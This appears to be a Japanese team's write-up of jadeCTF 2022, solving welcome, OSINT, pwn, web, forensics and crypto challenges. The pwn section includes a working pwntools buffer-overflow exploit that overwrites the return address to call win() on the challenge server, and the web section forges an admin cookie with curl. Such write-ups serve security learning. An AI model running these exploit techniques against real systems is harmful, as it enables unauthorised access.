この大会は2022/10/21 15:30(JST)~2022/10/23 15:30(JST)に開催されました。
今回もチームで参戦。結果は500点で629チーム中142位でした。
自分で解けた問題をWriteupとして書いておきます。
WELCOME (MISC)
base64デコードする。
$ echo amFkZUNURnt3M2xjMG0zX3QwX2o0ZGVfY3RmfQo= | base64 -d jadeCTF{w3lc0m3_t0_j4de_ctf}
jadeCTF{w3lc0m3_t0_j4de_ctf}
READ THE RULES (MISC)
ルールのページに透過色でフラグが書いてあった。
jadeCTF{R34D_73H_RuL32}
HERITAGE (OSINT)
写真の場所について、以下の質問に答える必要がある。
Whenever I look at this picture, three questions come to my mind. 1.What are those protuding like structures? 2.What is this place? 3.How old are they?
突き出たような構造物に絞り、画像検索する。Petrified Woodであることがわかる。その場所はOval Ground。さらに"iit garden Petrified wood age"で検索すると、以下のように書いてある。
It is famous for a 2.5 million years old
jadectf{Petrified_Wood_Oval_Ground_2500000}
BABY PWN (PWN)
$ file chall chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=9102a90681079c7c798825becb1be0a1851ff292, not stripped $ checksec.sh --file ./chall RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Partial RELRO No canary found NX enabled Not an ELF file No RPATH No RUNPATH ./chall
Ghidraでデコンパイルする。
undefined8 main(void) { setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); start_program(); return 0; } void start_program(void) { char local_208 [512]; puts("Enter your name:"); gets(local_208); printf("Hello %s, welcome to jadeCTF!\n",local_208); return; } void win(void) { char local_78 [104]; FILE *local_10; puts("Nice job :)"); local_10 = fopen("flag.txt","r"); if (local_10 == (FILE *)0x0) { puts("Sorry, flag doesn\'t exist."); /* WARNING: Subroutine does not return */ exit(0); } fgets(local_78,100,local_10); printf("Here is your flag: %s\n",local_78); return; }
$ gdb -q ./chall Reading symbols from ./chall... (No debugging symbols found in ./chall) gdb-peda$ pattc 600 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs' gdb-peda$ r Starting program: /mnt/hgfs/Shared/chall [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Enter your name: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs Hello AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs, welcome to jadeCTF! Program received signal SIGSEGV, Segmentation fault. Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated. Use 'set logging enabled off'. Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated. Use 'set logging enabled on'. [----------------------------------registers-----------------------------------] RAX: 0x274 RBX: 0x0 RCX: 0x7ffff7e92a37 (<__GI___libc_write+23>: cmp rax,0xfffffffffffff000) RDX: 0x0 RSI: 0x7fffffffbc90 ("Hello AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZA"...) RDI: 0x7fffffffbb70 --> 0x7ffff7de00d0 (<__funlockfile>: endbr64) RBP: 0x4e73413873416973 ('siAs8AsN') RSP: 0x7fffffffdfb8 ("AsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs") RIP: 0x4007f8 (<start_program+68>: ret) R8 : 0x274 R9 : 0x7fffffff R10: 0x0 R11: 0x246 R12: 0x7fffffffe0d8 --> 0x7fffffffe3ed ("/mnt/hgfs/Shared/chall") R13: 0x4007f9 (<main>: push rbp) R14: 0x0 R15: 0x7ffff7ffd040 --> 0x7ffff7ffe2e0 --> 0x0 EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x4007f1 <start_program+61>: call 0x4005d0 <printf@plt> 0x4007f6 <start_program+66>: nop 0x4007f7 <start_program+67>: leave => 0x4007f8 <start_program+68>: ret 0x4007f9 <main>: push rbp 0x4007fa <main+1>: mov rbp,rsp 0x4007fd <main+4>: mov rax,QWORD PTR [rip+0x20086c] # 0x601070 <stdout@@GLIBC_2.2.5> 0x400804 <main+11>: mov ecx,0x0 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffdfb8 ("AsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs") 0008| 0x7fffffffdfc0 ("OAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs") 0016| 0x7fffffffdfc8 ("slAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs") 0024| 0x7fffffffdfd0 ("AsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs") 0032| 0x7fffffffdfd8 ("SAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs") 0040| 0x7fffffffdfe0 ("sqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAs") 0048| 0x7fffffffdfe8 ("AsVAstAsWAsuAsXAsvAsYAswAsZAsxAs") 0056| 0x7fffffffdff0 ("WAsuAsXAsvAsYAswAsZAsxAs") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00000000004007f8 in start_program () gdb-peda$ patto AsjAs9As AsjAs9As found at offset: 520
BOFでwin関数をコールすればよい。
#!/usr/bin/env python3 from pwn import * if len(sys.argv) == 1: p = remote('34.76.206.46', 10002) else: p = process('./chall') elf = ELF('./chall') win_addr = elf.symbols['win'] payload = b'A' * 520 payload += p64(win_addr) data = p.recvline().rstrip() print(data) print(payload) p.sendline(payload) data = p.recvline().rstrip() print(data) for _ in range(2): data = p.recvline().decode().rstrip() print(data)
実行結果は以下の通り。
[+] Opening connection to 34.76.206.46 on port 10002: Done
[*] '/mnt/hgfs/Shared/chall'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
b'Enter your name:'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF\x07@\x00\x00\x00\x00\x00'
b'Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF\x07@, welcome to jadeCTF!'
Nice job :)
Here is your flag: jadeCTF{buff3r_0v3rfl0ws_4r3_d4ng3r0u5}
[*] Closed connection to 34.76.206.46 port 10002
jadeCTF{buff3r_0v3rfl0ws_4r3_d4ng3r0u5}
ULTRA BABY WEB (WEB)
クッキーにuser=adminをセットして、リクエストする。
$ curl -b 'user=admin' http://34.76.206.46:10010/ <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Ultra Baby Web</title> <link rel="shortcut icon" href="oswap.png" type="image/png"> <link rel="stylesheet" href="index.css"> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Rubik:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet"> </head> <body> <header> <div class="title"> Ultra Baby Web </div> <div class="level-title"> Ultra Baby Web </div> </header> <main> <div class="container"> <div class="container__title"> Ultra Baby Web </div> <div class="wrapper"> <div class="wrapper__title"> My grandma makes the best cookies xD </div> <div class="wrapper__description"> <center><img src="cookies.png" height=30% width=80%></center> <br> <center><h1>jadeCTF{my_l0v3_f0r_c00k1es_1s_n3ver_end1ng}</h1><center> </div> </div> </div> </main> </body> </html>
jadeCTF{my_l0v3_f0r_c00k1es_1s_n3ver_end1ng}
LM10 (DFIR)
httpでフィルタリングする。No.258のパケットでGET /random.pngをリクエストしており、画像が取得されている。この画像にフラグが書かれていた。
jctf{No_doubt_he's_the_best_in_the world}
AUTOCAD (DFIR)
IHDRチャンクにある幅、高さをブルートフォースでCRCが一致するものを探す。
#!/usr/bin/env python3 import struct import binascii with open('poster.png', 'rb') as f: data = f.read() head = data[:12] tail = data[29:] found = False for h in range(1, 512): for w in range(1, 1024): width = struct.pack('>I', w) height = struct.pack('>I', h) ihdr = data[12:16] + width + height + data[24:29] crc = struct.pack('!I', binascii.crc32(ihdr)) if crc == data[29:33]: found = True out = head + ihdr + tail with open('poster_fix.png', 'wb') as f: f.write(out) break if found: break
画像を復元したが、画像にはフラグは書かれていない。StegSolveで開き、Green plane 4を見ると、フラグが書いてあった。
jctf{st3g_1s_easy_as_f**k}
HANDS (CRYPTO)
hands sygnalで調べると、以下のページなどで対応表が得られる。
https://fineartamerica.com/featured/vector-illustration-of-sign-language-basheera-designs.html?product=poster
手の画像に対応するアルファベットを書き並べる。
JADECTFCRYP TOISFUNORIS IT
jadeCTF{CRYPTOISFUNORISIT}
BABY RSA (CRYPTO)
nが非常に大きく、eが3で小さいので、Low Public-Exponent Attackで復号する。
#!/usr/bin/env python3 from Crypto.PublicKey import RSA from Crypto.Util.number import * import gmpy2 c = 0x125eade3ceb41b6cf53f5edb012024e2049568540d0b833323bed4946d66487e1f03439592e5bf12430a44be9b8f84fb00f33e62b2e85d5b20e74c276d75cf443a06e2ca37e9907445d9dc03a3f35056b87f0a8eccd2f83f1eccab055c919065 with open('key.pem', 'r') as f: pub_data = f.read() pubkey = RSA.importKey(pub_data) n = pubkey.n e = pubkey.e m, success = gmpy2.iroot(c, e) assert success flag = long_to_bytes(m).decode() print(flag)
jadeCTF{rs4_1s_s0_fr3ak1ng_3asy}
